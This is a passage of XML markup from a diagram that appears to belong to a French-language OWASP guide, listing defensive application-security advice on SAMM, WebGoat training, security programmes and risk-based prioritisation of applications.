              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>.NET</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>PHP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Classic ASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Python</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Cold Fusion</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="2165815"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="2031448"/>
          <a:ext cx="940189" cy="96630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b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>Contrôles</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> de</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurité</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>communs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="2077344"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="725058"/>
          <a:ext cx="773043" cy="5608320"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Afin d'améliorer le processus que suit votre organisation pour le développement d'applications, l'OWASP recommande l'"</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>OWASP Software Assurance </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>Maturity</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t> Model (SAMM)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>". Ce modèle aide les organisations à formuler et implémenter une stratégie adaptée aux risques spécifiques auxquels elles sont confrontées.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="3180434"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="3046067"/>
          <a:ext cx="940189" cy="96630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19050" rIns="0" bIns="19050" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Cycle de</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>développement</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurisé</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="3091963"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="1739677"/>
          <a:ext cx="773043" cy="5608320"/>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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>Le projet éducation de l'OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> met à disposition des ressources de formation afin d'aider à la sensibilisation des développeurs. Il regroupe une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>liste de présentations</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> à cette fin. Afin de vous confronter aux vulnérabilités les plus courantes, essayez l'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>OWASP WebGoat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>WebGoat.NET</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> ou encore le </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>projet applications web défaillantes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>. Et pour rester à jour, venez assister à une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>conférence AppSec OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, une session de formation, ou une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>réunion du chapitre OWASP local</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="4195053"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{573CF2CD-94C3-4404-8E22-47B8390B5477}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="4060686"/>
          <a:ext cx="940189" cy="96630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b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Formation </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>à</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> la </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurité</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t>applicative</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="4106582"/>
        <a:ext cx="848397" cy="8745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11052" y="-2191458"/>
          <a:ext cx="93702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just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Etablissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>programme</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t> de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>sécurisation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t> des applications</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> , et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>pilotez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>son adoption.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Procédez à une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>analyse des lacunes des capacités comparant votre organisation à vos pairs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> pour définir les principaux axes d'amélioration et un plan d'exécution.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Faites entériner ce programme par la </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Direction </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>et lancez une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>campagne </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>sensibilisation à la sécurité </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>applications</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> pour l'ensemble de l'organisation informatique.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1899787" y="165549"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="990602" y="2678"/>
          <a:ext cx="909184"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en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Pour commencer</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1034985" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4240761" y="-961617"/>
          <a:ext cx="93702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just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Identifier et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>prioriser votre portefeuille d'applications </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>du point de vue du risque inhérent.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Créer un modèle de profil de risque applicatif pour mesurer et hiérarchiser vos applications.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Établissez des directives d'assurance pour définir correctement la couverture et le niveau de rigueur requis.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Définissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>modèle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>commun</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>d’évaluation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t> des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>risques</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>avec un ensemble cohérent de probabilité et de facteurs d'impact reflétant la tolérance de votre organisation pour le risque.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1929496" y="1395390"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="990602" y="1232520"/>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fr-FR" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Approche </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>basée sur le risque</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1036435" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4240761" y="268223"/>
